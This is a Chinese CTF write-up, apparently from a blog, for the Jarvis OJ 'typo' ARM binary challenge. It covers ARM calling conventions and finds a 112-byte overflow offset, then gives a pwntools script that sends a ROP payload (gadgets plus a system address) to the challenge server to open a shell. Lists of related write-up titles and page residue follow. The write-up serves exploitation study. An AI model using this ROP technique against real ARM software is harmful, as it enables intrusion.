jarvis oj typo
m4x的–如何pwn掉一个arm binary
arm 的参数 1 ~ 4 分别保存到 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡, 返回值存放在 r0中
by the way, arm 的 pc 指针相当于 eip/rip, b/bl 等指令实现了跳转
按程序流程输入超长的字符串,这里用pwndbg中的cyclic构造字符串,因为peda中的pattern好像有点问题。输入超长字符串后发现程序崩溃,返回值保存在r0中,也就是显示的rax。
查找r0中0x62616164在字符串的位置,为112,也就是缓冲区是0~111。
pwndbg> cyclic -l 0x62616164
112
接下来查找可利用的gadget
那么构造payload='a'*112+p32(0x20904)+p32(0x6c384)+p32(1)+p32(system_address)
找system_address只能靠经验了,符号表被去除了,网上有方法用rizzo还原符号表但一直安装不成功。
脚本如下:
from pwn import *
context.log_level = "debug"#p = process("./typo")
p = remote("pwn2.jarvisoj.com", 9888)p.sendafter("quit\n", "\n")
p.recvline()payload = 'a' * 112 + p32(0x20904) + p32(0x6c384) + p32(1) + p32(0x110B4)
p.sendlineafter("\n", payload)
p.interactive()
jarvis oj typo相关推荐
- [Jarvis OJ - PWN]——Typo(内涵peak小知识)
[Jarvis OJ - PWN]--Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构.还是第一次遇到. pe ...
- [Jarvis OJ - PWN]——Backdoor
[Jarvis OJ - PWN]--Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的. ...
- [Jarvis OJ - PWN]——[61dctf]fm
[Jarvis OJ - PWN]--[61dctf]fm 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下, 开启了canary ...
- [Jarvis OJ - PWN]——Test Your Memory
[Jarvis OJ - PWN]--Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA e ...
- [Jarvis OJ - PWN]——[XMAN]level4
[Jarvis OJ - PWN]--[XMAN]level4 题目地址: https://www.jarvisoj.com/challenges 题目: checksec一下 IDA中 思路 0x1 ...
- [Jarvis OJ - PWN]——Smashes
[Jarvis OJ - PWN]--Smashes 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下看看.64位,并且除了PIE ...
- [Jarvis OJ - PWN]——[XMAN]level3_x64
[Jarvis OJ - PWN]--[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再 ...
- [Jarvis OJ - PWN]——[XMAN]level3
[Jarvis OJ - PWN]--[XMAN]level3 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,32位程序开启了NX保 ...
- [Jarvis OJ - PWN]——[XMAN]level2(x64)
[Jarvis OJ - PWN]--[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序. ...
- [Jarvis OJ - PWN]——Tell Me Something
[Jarvis OJ - PWN]--Tell Me Something 题目地址:https://www.jarvisoj.com/challenges 题目: 还是先checksec一下,64位开 ...
最新文章
- Microsoft Dynamics CRM 2013 and 2011 Update Rollups and Service Packs
- python plotly 多个表格_Plotly Python - 更改表格
- qt自定义控件的样式
- 改变php二维数组的值_php如何修改二维数组中的值?
- aix 的c库为什么都是静态库_Linux静态库生成指南
- 学校邮箱注册IDEA、pycharm等全家桶(正式版就是香)
- 企业者的福音之8266接入阿里智能,点亮一盏灯
- fetchtype 动态控制_hibernate 中 fetch=FetchType.LAZY 懒加载失败处理方法
- 30岁学python有前途吗-30岁新手入门python!尝试人生另一种可能
- 好程序员分享js实现简单的板球游
- 动态修改UINavigationBar的背景色
- 【转】JQuery中$.each 和$(selector).each()的区别详解
- 怎么修改管家婆服务器密码忘记,管家婆操作员密码找回教程.doc
- 数字化定量分析_数字化驱动下的华夏银行信用卡精细化智能服务
- ubuntu处理openproj不能使用问题
- ubuntu20.04 wps安装流程及问题解决
- python正则抓取身份证号码,验证18位身份证号码是否正确
- mate桌面暗色调超好看的配置
- 计算机怎样禁止再添加新用户,Win10如何添加新用户?
- 详解旨在提升EVM底层性能的兼容公链Monad